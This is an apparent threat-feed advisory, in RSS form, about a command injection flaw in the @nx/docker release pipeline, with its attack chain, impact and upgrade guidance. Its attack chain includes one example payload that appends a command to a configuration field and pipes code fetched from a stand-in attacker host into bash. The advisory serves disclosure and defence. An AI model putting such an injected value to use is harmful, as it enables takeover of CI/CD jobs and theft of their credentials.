<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:webfeeds="http://webfeeds.org/rss/1.0"><channel><title>@Nx/Docker (&gt;= 21.4.0, &lt; 22.7.8; &gt;= 23.0.0, &lt; 23.1.1) - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/products/@nx/docker--21.4.0--22.7.8--23.0.0--23.1.1/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Tue, 06 Oct 2026 00:45:25 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/products/@nx/docker--21.4.0--22.7.8--23.0.0--23.1.1/feed.xml" rel="self" type="application/rss+xml"/><image><url>https://feed.craftedsignal.io/favicon-32x32.png</url><title>CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/</link><width>32</width><height>32</height></image><webfeeds:icon>https://feed.craftedsignal.io/favicon.svg</webfeeds:icon><item><title>OS Command Injection in @nx/docker Release Pipeline</title><link>https://feed.craftedsignal.io/briefs/2026-10-nx-docker-injection/</link><pubDate>Tue, 06 Oct 2026 00:45:25 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-10-nx-docker-injection/</guid><description>The @nx/docker package is vulnerable to OS command injection via insecure shell command construction, allowing arbitrary command execution during release processes through malicious configuration inputs.</description><content:encoded><![CDATA[<p>The @nx/docker package contains an OS command injection vulnerability (CVE-2026-104859) within its release pipeline logic. During the execution of <code>nx release version</code> or <code>nx release publish</code>, the package constructs <code>docker</code> CLI commands by concatenating strings derived from the <code>release.docker.repositoryName</code> and <code>registryUrl</code> fields in the Nx configuration. Because these constructed strings are passed directly to <code>/bin/sh -c</code>, an attacker with control over the Nx configuration - such as a contributor to a repository or an actor who can submit a pull request - can inject arbitrary shell commands. These commands execute with the security context of the CI/CD job, which typically includes elevated privileges, access to registry credentials, and sensitive cloud tokens. The vulnerability is present in versions 21.4.0 through 22.7.7 and 23.0.0 through 23.1.0. Even <code>--dry-run</code> operations are insufficient for mitigation, as some injected commands execute prior to the dry-run validation logic.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains access to modify the Nx configuration file within a project.</li>
<li>The attacker updates the <code>release.docker.repositoryName</code> or <code>registryUrl</code> configuration field to include shell command injection payloads (e.g., <code>; curl attacker.com/payload | bash</code>).</li>
<li>The target CI/CD environment or a developer triggers the <code>nx release version</code> command as part of the release lifecycle.</li>
<li>The <code>@nx/docker</code> package reads the malicious configuration string.</li>
<li>The package constructs a shell command string using the attacker-supplied input.</li>
<li>The package executes the constructed string using <code>/bin/sh -c</code>.</li>
<li>The system interprets the injected shell syntax, executing the attacker's payload with the CI/CD agent's permissions.</li>
<li>The attacker achieves code execution to exfiltrate credentials or compromise the build environment.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows for arbitrary code execution in CI/CD environments. Since release jobs often require privileged access to container registries and secret management stores, an attacker can leverage this access to exfiltrate credentials, inject malicious code into build artifacts, or gain unauthorized access to underlying infrastructure. There is no evidence of in-the-wild exploitation currently, but the high impact on secure supply chain integrity necessitates immediate remediation.</p>
<h2 id="recommendation">Recommendation</h2>
<ol>
<li>Upgrade all instances of <code>@nx/docker</code> to versions 22.7.8 or 23.1.1 or later using <code>nx migrate 23.1.1</code> or equivalent dependency manager updates.</li>
<li>Audit all existing Nx configuration files for anomalous <code>repositoryName</code> or <code>registryUrl</code> values that contain shell metacharacters or unexpected command strings.</li>
<li>Delete any Docker version files generated by vulnerable versions of <code>@nx/docker</code> to ensure that previously interpolated malicious references are not read during subsequent publishing tasks.</li>
<li>Restrict CI/CD environment access to configuration-modifying operations to trusted personnel only, reducing the likelihood of malicious modifications to build metadata.</li>
</ol>
]]></content:encoded><category domain="severity">high</category><category domain="type">threat</category></item></channel></rss>